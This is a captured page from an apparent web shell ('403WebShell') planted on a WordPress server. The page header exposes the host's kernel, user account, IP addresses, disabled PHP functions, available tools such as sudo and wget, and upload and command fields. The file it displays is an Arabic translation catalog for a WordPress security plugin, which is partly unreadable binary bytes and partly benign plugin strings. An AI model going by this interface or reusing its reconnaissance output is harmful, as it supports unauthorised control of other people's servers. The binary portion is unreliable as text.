Uname:Linux server.rehabsharif.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64

Base Dir : /home/nobi37te/public_html

User : nobi37te


403WebShell
403Webshell
Server IP : 104.21.25.182  /  Your IP : 216.73.216.79
Web Server : Apache
System : Linux server.rehabsharif.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User : nobi37te ( 1003)
PHP Version : 8.2.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/nobi37te/www/wp-content/languages/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/nobi37te/www/wp-content/languages/plugins/all-in-one-wp-security-and-firewall-ar.mo
��[�
��		0/`Ud���D
"Or6�E� (`EF�;�T) �~ �-!2�!d�!EN"e�"b�"�]#B�#?/$6o$-�$�$�$i�$)^%��%`#&;�&��&�A'�(�(�(�()*)~0)��)=*KI*{�*�+��+�a,:�,++-'W--- �-�-	�-�-�-.�	.L�.�/�/&�0&	1-01^1
d1$r1+�1�1V�1i52n�2,30;3%l3�3-�3�38�3014[b40�4�4=5D5Z5�o5
�5	666�#6�6��6L`7%�7e�7e98�8�8�8��8��9g:�j:g�:�d;F�;�:<��<�n=�>��>��?
@�*@QASAQ`AA�Ae�AKZB}�B�$Cp�C�D�D�D,�D
"E0E	DE�NE��E��Fn:GC�G��G��HIII2IjBIC�I�I��I�J��J@mK�K�K�K�K=�K2'L3ZL"�L'�L.�L!Mj*Mh�M�M/N�NNA�NAO
VO�dOP!P8P/JP1zP�P�P'�P'�P
Q%Q#EQiQ_qQ:�QKRXRaR{R�RA�R`�RXSS�S)�S�SlT�oT�U#�UYV|[V��V�We�W+9X-eX/�X��X^fY�YO�Y_1Z/�Z7�Z-�Zd'[��[�\��\�=][^v_^i�^�@_��_=u`Q�a@boFbG�b_�b�^c}�c�_dU�d�OeF�e|!fI�fX�fjAg��g�1h/icOiR�iGj�Nj@�j�kR�k{�k{ml\�lDFmC�m=�m4
n[Bn%�n��nQo4ao8�o�o�o+�opp	/p9pFp8Wp%�p�pT�p[q[mqW�q!rR9rU�r]�r�@s=�s )tMJtQ�tX�tnCuB�u��u5�vf�v/#wQSw�w�w$�wxPxFox&�xS�xG1y[yy�y�y�y�yzzzzz"z#:z^zuz�z�z�z�z�z	�zB�z
{{
{'{+{4{:{A{H{L{,k{��{	[}-e}8�}�}��}!w~�~(�~
�~}�~&_�J�N�&<�2c������N����|����Ne����a:������ۆR�a?�V��:��
3�=>�||�H���B���b����}�d`�
ŏ0Џ4�;6�
r��}��k�"C��f������Z����Nז^&�j��F�<7� t�&��&�������`֙77�Lo�9��J��QA�!��,��K�J.�3y�����H������UN�C��'�E�DV�y��n�|��>�@�EX������ˤ+��
��̥������Ԧ��?r�����n��/�
M�X��i��
�t����dy��ޯ����:�}
�$�����s�'��z��
0�c;�P����N���������kr�޼��;�J�%i�$����UԾ�*��"�t���k��f�
��
�,'�,T����q6������
�����k���
�+#�DO�R��G��V/�B��I��N�5b�����/�?�WD�+��c��&,�"S�=v�������T��VP���+��F��F'�n�$��(��&�����U�����n���1��-��d��e���'��I����'���/��(��k ����qC�8�����Gz�Y��S��p�lD�-��k��nK�Q��a�an�m���>�����������Q��������?����m#�c�����O���������L���3����M�����q��������X���3�����[����v��M�������6���me�z��N�^��m�<��T�RMqC�7,d>|��5�M&@t�m��0���Z'�{u��
��hq(�s�w�	��	r*
��
oW��:H��*
8I
/�
-�
��
pD��5T��(�
����
';9#u������l�
�
���
��
�
�%�0Qz�'j�34����u8)&D=YR��!SPJZLB�a�/�):��AXD�y|��
�U��+9^��.�G��}n��!�5���>s]�,,o?be@���?���9�rOEO�+����8T"iK�m�pMI7K�U���$���Af"C�NQ��'*�Gt J�v�����1��=�3lc%�\���2�{V;[#��	R�P�N�2�&W[B�g>(�%�<�$����(�EIqw��CF�� k�
-Wx<V5�dX�_�/�6�0.�S����M-�0
Y��H4�@F�hT�����7	L�#��H�1��`�:�Z�*
6��������;~�%1$s %2$d%s table name update failed%s tables had their prefix updated successfully!%s?(Minutes) The user will be forced to log back in after this time period has elapased.. Scan was generated on....and much more..htaccess file to restore from1 sec1) Block forbidden characters commonly used in exploitative attacks.1) Denial of Service (DoS) attacks1) Enable the checkbox.1) Protect your htaccess file by denying access to it.2) Block malicious encoded URL characters such as the ".css(" string.2) Disable the server signature.2) Hacking internal routers.3) Guard against the common patterns and specific exploits in the root portion of targeted URLs.3) Scanning ports in internal networks to get info from various hosts.4) Protect your wp-config.php file by denying access to it.4) Stop attackers from manipulating query strings by disallowing illicit characters.<strong>ERROR</strong>: Cookies are blocked due to unexpected output. For help, please see <a href="%1$s">this documentation</a> or try the <a href="%2$s">support forums</a>.<strong>ERROR</strong>: Cookies are blocked or not supported by your browser. You must <a href="%s">enable cookies</a> to use WordPress.<strong>ERROR</strong>: Invalid login credentials.<strong>ERROR</strong>: You are not allowed to register because your IP address is currently locked!<strong>ERROR</strong>: Your answer was incorrect - please try again.<strong>You have successfully updated WordPress!</strong> Please log back in to see what&#8217;s new.A 404 or Not Found error occurs when somebody tries to access a non-existent page on your website.A Brute Force Attack is when a hacker tries many combinations of usernames and passwords until they succeed in guessing the right combination.A backup copy of your wp-config.php file was created successfully!A blocked visitor will be automatically redirected to this URL.A file change was detected on your system for site URLA summary of the scan results is shown below:AdvancedAll In One WP SecurityAll other bots from other organizations such as "Yahoo", "Bing" etc will not be affected by this feature.All round best WordPress security plugin!Although most of the bots out there are relatively harmless sometimes website owners want to have more control over which bots they allow into their site.An effective Brute Force prevention technique is to change the default WordPress login page URL.An email has been sent to you with the unlock instructions.Any person trying to access your login page who does not have the special cookie in their browser will be automatically blocked.Apart from choosing strong passwords, monitoring and blocking IP addresses which are involved in repeated login failures in a short period of time is a very effective way to stop these types of attacks.Apart from the security protection benefit, this feature may also help reduce load on your server, particularly if your site currently has a lot of unwanted traffic hitting the XML-RPC API on your installation.ApplyBackup .htaccess fileBackup wp-config.php fileBackup your databaseBasicBeing informed of any changes in your files can be a good way to quickly prevent a hacker from causing damage to your website.Below is the current status of the critical features that you should activate on your site to achieve a minimum level of recommended securityBrute ForceBy default the nickname is set to the login (or user) name of your account.By default, an Apache server will allow the listing of the contents of a directory if it doesn't contain an index.php file.By doing this, malicious bots and hackers will not be able to access your login page because they will not know the correct login page URL.By inspecting the IP address data coming from spammers you will be in a better position to determine which addresses or address ranges you should block by adding them to the permanent block list.By leaving this feature enabled you will prevent Jetpack or Wordpress iOS or other apps which need XMLRPC from working correctly on your site.Check this if you want to enable the logging of 404 eventsCheck your email for the confirmation link.Check your email for your new password.Checking for MySQL tables of type "view".....Choose a new username for admin.Confirm new passwordDashboardDatabase SecurityDateDaysDepending on the nature and cause of the error or warning, your hosting server can create multiple instances of this file in numerous directory locations of your WordPress installation.Disabling trace and track on your site will help prevent HTTP Trace attacks.Due to the fact that at any one time there may be many concurrent login attempts occurring on your site via malicious automated robots, this also has a negative impact on your server's memory and performance.Due to the fact that the image being displayed on the other person's site is coming from your server, this can cause leaking of bandwidth and resources for you because your server has to present this image for the people viewing it on someone elses's site.ERROR: Unable to process your request!Each IP address must be on a new line.Each user agent string must be on a new line.EmailEmail AddressEnable IP blocking for 404 detectionEnable manual approval of new registrationsEnter System Log File NameEnter a message you wish to display to visitors when your site is in maintenance mode.Enter each file or directory on a new line which you wish to exclude from the file change detection scan.Enter each file type or extension on a new line which you wish to exclude from the file change detection scan.Enter one or more IP addresses or IP ranges.Enter one or more email addresses on a new line.Enter one or more user agent strings.Enter something special:Enter your custom .htaccess rules/directives.Enter your new password below.Enter your system log file name. (Defaults to error_log)Error - Could not get tables or no tables found!Error updating user_meta table where new meta_key = %s, old meta_key = %s and user_id = %s.Example 1 - A single user agent string to block:Example 1: 195.47.89.*Example 2 - A list of more than 1 user agent strings to blockExample 2: 195.47.*.*Example 3: 195.*.*.*Example: If you want the scanner to ignore certain files in different directories or whole directories, then you would enter the following:Export to CSVFileFile/FolderFirewallFor Example: If a settings item relies on the domain URL then it may not work correctly when imported into a site with a different domain.FramesFrom a security perspective, leaving your nickname the same as your user name is bad practice because it gives a hacker at least half of your account's login credentials.From now on you will need to log into your WP Admin using the following URL:Go to the %s menu to see more detailsHTTP Trace attack (XST) can be used to return header requests and grab cookies and other information.Hackers can exploit various vulnerabilities in the WordPress XML-RPC API in a number of ways such as:Helpful Tip:HoneypotHoursHowever, in some cases you may find many repeated 404 errors which occur in a relatively short space of time and from the same IP address which are all attempting to access a variety of non-existent page URLs.However, sometimes people or other plugins modify the various permission settings of certain core WP folders or files such that they end up making their site less secure because they chose the wrong permission values.IPIf given an opportunity hackers can insert their code or files into your system which they can then use to carry out malicious acts on your site.If the bot fails the checks then the plugin will mark it as being a fake Googlebot and it will block itIf the maximum number of failed login attempts for a particular IP address occur within this time period the plugin will lock out that addressIf this was a mistake, just ignore this email and nothing will happen.If you break your site you will need to access your server via FTP or something similar and then edit your .htaccess file and delete the changes you made.If you do not use the WordPress password protection feature for your posts or pages then it is highly recommended that you leave this checkbox disabled.If you still need XMLRPC then uncheck the "Completely Block Access To XMLRPC" checkbox and enable only the "Disable Pingback Functionality From XMLRPC" checkbox.If you suspect there is a user or users who are logged in which should not be, you can block them by inspecting the IP addresses from the data below and adding them to your blacklist.If you think that some plugin functionality on your site is broken due to a security feature you enabled in this plugin, then use the following option to turn off all the security features of this plugin.If your chosen server variable fails the plugin will automatically fall back to retrieving the IP address from $_SERVER["REMOTE_ADDR"]Import/ExportIn general, WordPress core and plugin files and file types such as ".php" or ".js" should not change often and when they do, it is important that you are made aware when a change occurs and which file was affected.Incorrect .htaccess rules or directives can break or prevent access to your site.IntermediateIt is important that you save this URL value somewhere in case you forget it, OR,It is recommended that you perform a %s before using this featureIt is useful for when you want to tweak our existing firewall rules or when you want to add your own.It is your responsibility to ensure that you are entering the correct code!It will then perform a few tests to verify if the bot is legitimately from Google and if so it will allow the bot to proceed.It's a good idea to not redirect attempted brute force login attempts to your site because it increases the load on your server.Leave this feature disabled and use the feature below if you want pingback protection but you still need XMLRPC.Locking your site down to general visitors can be useful if you are investigating some issues on your site or perhaps you might be doing some maintenance and wish to keep out all traffic for security reasons.Log InLog inLogin to your site to view the scan details.Lost PasswordLost your password?More InfoNOTE: If you are currently logged in as "admin" you will be automatically logged out after changing your username and will be required to log back in.NOTE: If you are hosting your site on WPEngine or a provider which performs server caching, you will need to ask the host support people to NOT cache your renamed login page.NOTE: If you use Jetpack or the Wordpress iOS or other apps then you should enable this feature but leave the "Completely Block Access To XMLRPC" checkbox unchecked.NOTE: Some of these strings might be used for plugins or themes and hence this might break some functionality.NOTE: Some strings for this setting might break some functionality.NOTE: This feature does NOT use the .htaccess file to permanently block the IP addresses so it should be compatible with all web servers running WordPress.NOTE: You should only enable this feature if you are not currently using the XML-RPC functionality on your WordPress installation.NameNew passwordNo action required.No items found.Normally if you wanted to login to WordPress you would type your site's home URL followed by wp-login.php.Number of users currently logged into your site (including you) is:OROften when malware code has been inserted into your site you will normally not notice anything out of the ordinary based on appearances, but it can have a dramatic effect on your site's search ranking.OnOne way to add a layer of protection for your DB is to change the default WordPress table prefix from "wp_" to something else which will be difficult for hackers to guess.Only the "superadmin" can block IP addresses from the main site.PagePasswordPassword ResetPlace custom rules at the topPlease change the prefix manually for the above tables to: %sPlease choose a file to import your settings from.Please choose a wp-config.php file to restore from.Please enter a valid email addressPlease enter a value for the DB prefix.Please enter a value for your login page slug.Please enter an answer in digits:Please enter your email address and you will receive an email with instructions on how to unlock yourself.Please enter your username or email address. You will receive a link to create a new password via email.Please log back in to continue.Please select some records using the checkboxesPoor password selection is one of the most common weak points of many sites and is usually the first thing a hacker will try to exploit when attempting to break into your site.Possible reason: your host may have disabled the mail() function.Powered by WordPressRe-direct URLRedirecting a hacker or malicious bot back to "http://127.0.0.1" is ideal because it deflects them back to their own local host and puts the load on their server instead of yours.RegisterRegister For This SiteRegistration FormRegistration complete. Please check your email.Registration confirmation will be emailed to you.Remember MeReset PasswordRestore from a backed up .htaccess fileRestore from a backed up wp-config fileSave SettingsSave the current .htaccess fileSave the current wp-config.php fileScannerSet the length of time for which a blocked IP address will be prevented from visiting your siteSet the value for how often you would like a scan to occurSet the value for the maximum login retries before IP address is locked outSettingsSite Lockout NotificationSite response time monitoringSite uptime monitoringSomeone has requested a password reset for the following account:Sometimes your hosting platform will produce error or warning logs in a file called "error_log".Specify a URL to redirect a hacker to when they try to access your WordPress login page.Start typing a password.Starting DB prefix change operations.....Strength indicatorSuch behaviour can mean that a hacker might be trying to find a particular page or URL for sinister reasons.Take note of the IP addresses you want blocked and ask the superadmin to add these to the blacklist using the "Blacklist Manager" on the main site.The "File Change Detection Feature" will notify you of any file change which occurs on your system, including the addition and deletion of files by performing a regular automated or manual scan of your system's files.The %s feature is currently active.The %s table records which had references to the old DB prefix were updated successfully!The above firewall features will be applied via your .htaccess file and should not affect your site's overall functionality.The above meta information shows which version of WordPress your site is currently running and thus can help hackers or crawlers scan your site to see if you have an older version of WordPress or one with a known exploit.The email could not be sent.The feature will still allow XMLRPC functionality on your site but will disable the pingback methods.The following files were added to your hostThe following files were changed on your hostThe following files were removed from your hostThe longer and more complex your password is the harder it is for hackers to "crack" because more complex passwords require much greater computing power and time.The options table records which had references to the old DB prefix were updated successfully!The passwords do not match.The plugin has detected that you are using a Multi-Site WordPress installation.The usermeta table records which had references to the old DB prefix were updated successfully!There are no IP addresses currently locked out.There are no other site-wide users currently logged in.There are no other users currently logged in.This can be handy if you wanted to save time by applying the settings from one site to another site.This feature allows you to backup and save your currently active .htaccess file should you need to re-use the the backed up file in the future.This feature allows you to backup and save your currently active wp-config.php file should you need to re-use the the backed up file in the future.This feature allows you to block bots which are impersonating as a Googlebot but actually aren't. (In other words they are fake Google bots)This feature allows you to change the login URL by setting your own slug and renaming the last portion of the login URL which contains the <strong>wp-login.php</strong> to any string that you like.This feature allows you to disable the ability to select and copy text from your front end.This feature allows you to easily change the prefix to a value of your choice or to a random value set by this plugin.This feature allows you to prevent other sites from displaying any of your content via a frame or iframe.This feature allows you to put your site into "maintenance mode" by locking down the front-end to all visitors except logged in users with super admin privileges.This feature allows you to specify a time period in minutes after which the admin session will expire and the user will be forced to log back in.This feature also allows you to exclude certain files or folders from the scan in cases where you know that they change often as part of their normal operation. (For example log files and certain caching plugin files may change often and hence you may choose to exclude such files from the file change detection scan)This feature can be used to apply your own custom .htaccess rules and directives.This feature is not applicable for Windows server installations.This feature will allow you to remove the WP generator meta info and other version info from your site's pages.This feature will also remove the "X-Pingback" header if it is present.This feature will check if the User Agent information of a bot contains the string "Googlebot".This feature will deny access to your WordPress login page for all people except those who have a special cookie in their browser.This feature will deny login access for all IP addresses which are not in your whitelist as configured in the settings below.This feature will deny total site access for users which have IP addresses or user agents matching those which you have configured in the settings below.This feature will disable the ability for people to edit PHP files via the dashboard.This feature will prevent people from directly hotlinking images from your site's pages by writing some directives in your .htaccess file.This feature will prevent the listing of contents for all directories.This feature will scan the critical WP core folders and files and will highlight any permission settings which are insecure.This field will default to: http://127.0.0.1 if you do not enter a value.This hacking technique is usually used together with cross site scripting attacks (XSS).This information can be handy for identifying the most persistent IP addresses or ranges used by spammers.This is an advanced character string filter to prevent malicious string attacks on your site coming from Cross Site Scripting (XSS).This is because the bots and spiders from search engines such as Google have the capability to detect malware when they are indexing the pages on your site, and consequently they can blacklist your website which will in turn affect your search rankings.This is good security practice.This is often the first tool an attacker will use if able to login, since it allows code execution.This is where attackers use repeated login attempts until they guess the password.This plugin has detected that your site is running on a Windows server.This section contains a useful password strength tool which you can use to check whether your password is sufficiently strong enough.This setting allows you to enable/disable debug for this plugin.This setting matches for common malicious string patterns and exploits and will produce a 403 error for the hacker attempting the query.This setting will deny any requests that use a proxy server when posting comments.This setting will implement the 5G security firewall protection mechanisms on your site which include the following things:This setting will implement the 6G security firewall protection mechanisms on your site which include the following things:This setting will implement the following basic firewall protection mechanisms on your site:This tab displays all users who are currently logged into your site.This tab displays the list of all permanently blocked IP addresses.This will help protect you against malicious queries via XSS.To reset your password, visit the following address:To see a list of all locked IP addresses and ranges go to the %s tab in the dashboard menu.To use this feature do the following:Typically, most 404 errors happen quite innocently when people have mis-typed a URL or used an old link to page which doesn't exist anymore.Unlock link: %sUpdate of table %s failed: unable to change %s to %sUpdate of the following MySQL view definition failed: %sUseful Tip:UserUser registration is currently not allowed.UsernameUsername or Email AddressUsername:Username: %sView Blocked IPsWanna know more about the developers behind this plugin?We provide advice for malware cleanupWeeksWhen admin user is logged in, the feature is automatically disabled for his session.When enabled, this feature will print a "forbidden" error rather than the user information.When you submit a post or answer a comment, WordPress will usually display your "nickname".You are here because you have been locked out due to too many incorrect login attempts.You are now logged out.You are still advised to take a backup of your active .htaccess file just in case.You can also restore your site's .htaccess settings using a backed up .htaccess file.You can also restore your site's wp-config.php settings using a backed up wp-config.php file.You can view all accounts which have been newly registered via the handy table below and you can also perform bulk activation/deactivation/deletion tasks on each account.You cannot use the value "wp-admin" for your login page slug.You have logged in successfully.You have successfully enabled the cookie based brute force prevention featureYou have successfully saved cookie based brute force prevention feature settings.You may also be interested in the following alternative brute force prevention features:You may also want to checkout our %s feature for another secure way to protect against these types of attacks.You were logged out because you just changed the "admin" username.Your ".htaccess" file is a key component of your website's security and it can be modified to implement various levels of protection mechanisms.Your CAPTCHA answer was incorrect - please try again.Your WP installation already comes with reasonably secure file permission settings for the filesystem.Your WordPress login page URL has been renamed.Your WordPress system has a total of %s tables and your new DB prefix will be: %sYour account is now activeYour current login URL is:Your new WordPress login URL is now:Your password has been reset.Your password reset link appears to be invalid. Please request a new link below.Your password reset link has expired. Please request a new link below.Your registration is pending approval.Your session has expired because it has been over %d minutes since your last login.Your session has expired. Please log in to continue where you left off.Your site does not have a user account where the display name is identical to the username.[%s] Password Resetblockedeighteighteenelevenfifteenfivefourfourteenhtaccess backup failed.https://codex.wordpress.org/Cookieshttps://wordpress.org/https://wordpress.org/support/ninenineteenonepaging%1$s of %2$ssevenseventeensimply remember to add a "?%s=1" to your current site URL address.sixsixteensomedirectorytenthirteenthreetwelvetwentytwowp-config file to restore fromwp-config.php file was updated successfully!PO-Revision-Date: 2026-01-28 22:33:22+0000
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Plural-Forms: nplurals=6; plural=(n == 0) ? 0 : ((n == 1) ? 1 : ((n == 2) ? 2 : ((n % 100 >= 3 && n % 100 <= 10) ? 3 : ((n % 100 >= 11 && n % 100 <= 99) ? 4 : 5))));
X-Generator: GlotPress/4.0.3
Language: ar
Project-Id-Version: Plugins - All-In-One Security (AIOS) – Security and Firewall - Stable (latest release)
%1$s %2$dفشل في تعديل اسم الجدول %sتم تغيير بادئة الجداول %s بنجاح!%s?(بالدقائق) سيتم الطلب من المستخدم تسجيل الدخول بالموقع مرة أخرى بعد مرور هذه الفترة الزمنيةتم إجراء التفحص فيوالكثير ....الاستعادة من ملف .htaccessثانية1) حظر المحارف الممنوعة التي تستخدم بشكل شائع في الهجمات الاستغلالية.1) هجوم حجب الخدمة (DoS).1) تحديد المربع.1) حماية ملف .htaccess من خلال رفض الوصول إليه.2) حظر محارف الروابط الخبيثة مثل سلسلة  ".css(".2) تعطيل توقيع الخادم.2) اختراق الموجهات الداخلية.3) الحماية من الأنماط الشائعة أو الثغرات المحددة في جذر الروابط المستهدفة.3) تفحص المنافذ في الشبكات الداخلية للحصول على معلومات من أكثر من مستضيف.4) حماية ملف wp-config.php من خلال رفض الوصول إليه.4) منع القراصنة من التلاعب بسلاسل الاستعلام من خلال رفض المحارف غير المسموحة.<strong>خطأ</strong>: ملفات الكوكيز محظورة لسبب ما غير متوقّع . للحصول على مساعدة، يرجى الاطلاّع على <a href="%1$s">هذه الوثيقة</a> أو اللجوء إلى <a href="%2$s">منتديات الدعم</a>.<strong>خطأ</strong>: ملفات الكوكيز محظورة أو غير مدعومة من قبل متصفحك. يجب عليك <a href="%s">تفعيل الكوكيز</a> لاستخدام ووردبريس.<strong>خطأ</strong>: معلومات تسجيل دخول غير صحيحة.<strong>خطأ</strong>: لا يسمح لك بتسجيل الدخول بسبب حظر عنوان الانترنت IP الخاص بك.<strong>خطأ</strong>: إجابتك غير صحيحة - يرجى المحاولة مجدداً.<strong>تم تحديث ووردبريس بنجاح!</strong> يرجى إعادة تسجيل الدخول لعرض كل جديد.يحدث خطأ 404 أو خطأ الصفحة غير موجودة عندما يحاول الشخص الوصول إلى صفحة غير موجودة في موقع الويب الخاص بك.يكون هجوم القوة العمياء عندما يحاول القراصنة بتخمين مجموعات من أسماء المستخدمين وكلمات المرور حتى ينجحون بتخمين اسم المستخدم وكلمة المرور الصحيحين.تمت عملية النسخ الاحتياطي لملف wp-config.php بنجاح!سيتم توجيه الزائر المحظور بشكل تلقائي إلى هذا الرابط.تم اكتشاف تغيير ملف من ملفات نظامك لرابط الموقعيتم عرض ملخص نتائج التفحص أدناه:متقدمإضافة حماية ووردبريس الكل في واحدلن تتأثر البوتات من المنظمات الأخرى مثل الياهو أو البنغ بهذه الميزة.أفضل إضافة شاملة مختصة بحماية ووردبريس!بالرغم أن معظم البوتات غير ضارة، ولكن في بعض الأحيان يرغب مديري المواقع بتحديد البوتات المسموح لها بزيارة الموقع.يعتبر تغيير رابط صفحة تسجيل الدخول الافتراضية طريقة فعّالة لمنع هجمات القوة العمياء.تم إرسال رسالة إلكترونية لك متضمنةً تعليمات رفع الحظر بشكل أتوماتيكي سيتم حظر أي شخص ممن يحاول تسجيل الدخول بموقع الويب الخاص بك ولا يملك سجل الكوكيز المعيّن في متصفحه.بالإضافة إلى استخدام كلمة مرور قوية لمنع هذا النوع من الهجمات، كذلك يعتبر مراقبة وحظر عناوين الانترنت IPs المتورطة في عمليات تسجيل الدخول المتكررة والفاشلة في فترة زمنية قصيرة طريقة فعّالة للتصدي لهذه الهجمات.بالإضافة إلى فائدة الحماية التي تقدمها هذه الميزة، فإنّها أيضاً تساعد بتخفيف الضغط على الخادم، وخصوصاً في حالة وجود الكثير من زيارات الموقع غير المرغوبة التي تستهدف XML-RPC API في موقع الويب الخاص بك.تطبيقالنسخ الاحتياطي لملف .htaccessالنسخ الاحتياطي لملف wp-config.phpالنسخ الاحتياطي لقاعدة البياناتأساسييعتبر معرفة وجود أي تغييرات بملفات موقع الويب الخاص بك طريقة جيدة لمنع القراصنة بشكل سريع من التسبب بأي ضرر في موقع الويب الخاص بك.فيما يلي الحالة الحالية للمزايا المهمة التي يجب تفعيلها في موقع الويب الخاص بك لتحقيق الحد الأدنى للحماية المُوصى بهاهجوم القوة العمياءبشكل افتراضي، يكون الاسم المستعار نفس اسم تسجيل الدخول (اسم المستخدم) لحسابك.بشكل افتراضي، يقوم خادم الأباتشي بسرد محتويات المسار أو المجلد الذي لا يحتوي على ملف index.php بداخله.عند قيامك بهذا ستمنع كل البوتات الضارّة والقراصنة من الوصول لصفحة تسجيل الدخول، لإنّهم لن يعرفوا الرابط الصحيح لصفحة تسجيل الدخول.بالتحقق من بيانات عناوين الانترنت IPs الخاصة بمرسلي البريد المزعج، سيتم تحسين أداء تحديد مجال عناوين الانترنت أو عناوين الانترنت IPs التي يجب أن تقوم حظرها من خلال إضافتها إلى القائمة السوداء.يؤدي تفعيل هذه الميزة إلى منع إضافة Jetpack أو the WordPress iOS أو أي إضافات أخرى تستخدم وظائف XMLRPC من العمل الصحيح في موقع الويب الخاص بك.قم بتحديد هذا إذا أردت تفعيل سجلات أحداث 404.قم بتفقد البريد الإلكتروني للحصول على رابط التأكيد.يرجى تفقد بريدك الإلكتروني للحصول على كلمة المرور الجديدةالتحقق من جداول MySQL الخاصة بنوع "عرض".....قم بإدخال اسم مستخدم جديد للمدير.تأكيد كلمة المرورلوحة التحكم الرئيسيةحماية قاعدة البياناتالتاريخأياميقوم مزود الاستضافة بإنشاء نسخ متعددة من هذا الملف في مسارات متعددة في موقع ووردبريس حسب طبيعة وسبب الأخطاء والتحذيرات.يساعد تعطيل التعقيبات (trace and track) في منع هجمات تعقب HTTP.قد يحدث عدة محاولات متزامنة لتسجيل الدخول في موقع الويب الخاص بك من قبل الروبوتات المأتمتة الضارّة، ولهذا تأثير سلبي على أداء وذاكرة الخادم المستضيف لموقع الويب الخاص بك.في الواقع يستهلك عرض صورة موجودة على الخادم الخاص بك على موقع شخص آخر من حجم البيانات المنقولة وموارد الخادم الخاص بك، لأنّ على الخادم الخاص بك توفير هذه الصورة لزائري موقع ذلك الشخص.خطأ: عدم القدرة على معالجة طلبك!يجب إدراج كل عنوان انترنت IP على سطر مستقليجب إدراج كل اسم وكيل المستخدم على سطر مستقل.البريد الإلكترونيعنوان البريد الإلكترونيتفعيل حظر عناوين الانترنت المسببة لخطأ 404تفعيل الموافقة اليدوية على كل تسجيل جديدقم بإدخال اسم ملف سجل النظاميرجى إدخال الرسالة التي تودّ عرضها للزوار عند وضع موقع الويب الخاص بك في وضع الصيانة.قم بإدخال كل مسار الذي تريد استثنائه من عملية التفحص للكشف عن تغيير الملفات على سطر مستقل.قم بإدخال كل نوع أو امتداد من الملفات التي تريد استثنائها من عملية التفحص للكشف عن تغيير الملفات على سطر مستقل.إدخال عنوان انترنت واحد IP أو عدة عناوين انترنت IPs أو مجال معين من عناوين الانترنت IPs:قم بإدخال كل عنوان بريد إلكتروني على سطر مستقل.إدخال اسم وكيل المستخدم واحد أو أكثر.قم بإدخال قيمة مميزة: قم بإدخال قواعد/تعليمات .htaccess المخصصة.يرجى إدخال كلمة المرور الجديدة أدناه.قم بإدخال اسم ملف السجلات في الاستضافة الخاصة بك (الافتراضي: error_log )خطأ - لا يمكن الحصول على الجداول أو لم يتم العثور على أي جداولخطأ في تعديل جدول user_meta حيث meta_key الجديدة= %s و meta_key القديمة = %s و user_id = %sمثال 1- حظر اسم وكيل المستخدم واحد: مثال 1: 195.47.89.*مثال 2 - حظر قائمة أسماء وكلاء المستخدممثال 2: 195.47.*.*مثال 3: 195.*.*.*مثال: إذا أردت أن يقوم الماسح بتجاهل ملفات معينة في مسارات مختلفة أو تجاهل المسارات كاملةَ، عليك إدخال التالي: التصدير إلى ملف بصيغة CSVالملفالملف/المجلدالجدار الناريعلى سبيل المثال: لن تعمل الإعدادات المعتمدة على اسم مجال الموقع عند استيرادها في موقع باسم مجال مختلف.إطارات المحتوىمن ناحية أمنية، ليس من الجيد إبقاء الاسم المستعار الخاص بك نفس اسم المستخدم، لأنّ ذلك يعطي فرصة للقراصنة لمعرفة نصف معلومات تسجيل الدخول في الموقع.من الآن وصاعداً، عليك تسجيل الدخول بموقع الويب الخاص بك باستخدام الرابط الآتي: الانتقال إلى قائمة %s لعرض التفاصيليُمكن أن يتم استخدام هجوم تعقب HTTP أو هجوم XST لاسترداد ترويسة الطلبات والحصول على الكوكيز ومعلومات أخرى.يقوم القراصنة باستغلال ثغرات متنوعة في XML-RPC API الخاص بموقع ووردبريس باستخدام طرق متعددة مثل: نصيحة مساعدةمصائد الروبوتاتساعاتولكن في بعض الحالات تحدث أخطاء 404 بشكل متكرر في فترات متقاربة نسبياً بوساطة نفس عنوان الانترنت IP، الذي يحاول الوصول إلى روابط صفحات متنوعة على الموقع.ولكن، في بعض الأحيان يقوم بعض الأشخاص أو الإضافات بالتعديل على إعدادات الأذونات المختلفة الخاصة بمجلدات وملفات أساس موقع ووردبريس، مما يقلل من حماية الموقع بسبب وضع قيم الأذونات الخاطئة لهذه الملفات أو المجلدات.عنوان الانترنت IPإذا حصل القراصنة على فرصة، سيقومون بإدخال الملفات والأكواد الخاصة بهم في نظامك، والتي يتم استخدامها للقيام بإجراءات ضارّة على موقع الويب الخاص بك.إذا تم التحقق أنه بوت مزيف، سيتم تعليمه كبوت مزيف والقيام بحظره.إذا تم تجاوز العدد الأقصى لمحاولات تسجيل الدخول الخاصة بعنوان انترنت IP ما ضمن هذه الفترة الزمنية، سيتم حظر عنوان الانترنت IP هذا.إذا كان هناك خطأ، فقط تجاهل هذه الرسالة ولن يحدث أي شيء.إذا تعطل الموقع، قم بالوصول إلى ملفات الخادم عبر FTP أو ما يماثله، ثم احذف التغييرات التي قمت بها في .htaccess.يُوصى بشدة بعدم بتحديد هذا في حالة عدم استخدام ميزة حماية منشورات ووردبريس بكلمة مرور.إذا كنت بحاجة إلى وظيفة XMLRPC، قم بتعطيل "Completely Block Access To XMLRPC"، وقم بتفعيل فقط خيار "تعطيل وظيفة التنبيهات "Pingback" في XMLRPC".إذا اشتبهت بوجود مستخدمين مسجّلين حالياً ممن لا يجب تسجيل دخولهم بالموقع، تستطيع حظر هؤلاء المستخدمين من خلال تفحص عناوين الانترنت IPs الخاصة بهم الموجودة في البيانات أدناه، ومن ثم إضافتها إلى القائمة السوداء.إذا كنت تعتقد أن بعض وظائف الإضافة على موقعك معطلة بسبب ميزة حماية تم تمكينها في هذه الإضافة، فقم باستخدام الخيار التالي لتعطيل جميع ميزات الحماية لهذه الإضافة.إذا فشل متغير السيرفر المحدد، ستقوم الإضافة تلقائياً بالعودة إلى عنوان الانترنت IP المسترد من $_SERVER["REMOTE_ADDR"]استيراد/تصديربشكل عام، غالباً لا يجب تغيير ملفات أساس ووردبريس وملفات الإضافة مثل ملفات ".php" أو ".js"، ومن المهم معرفة حدوث أي تغيير -في حالة حدوثه- ومعرفة الملفات التي تم تغييرها.قد تسبب قواعد وتعليمات .htaccess الخاطئة عدم إمكانية الوصول إلى الموقع.متوسطمن 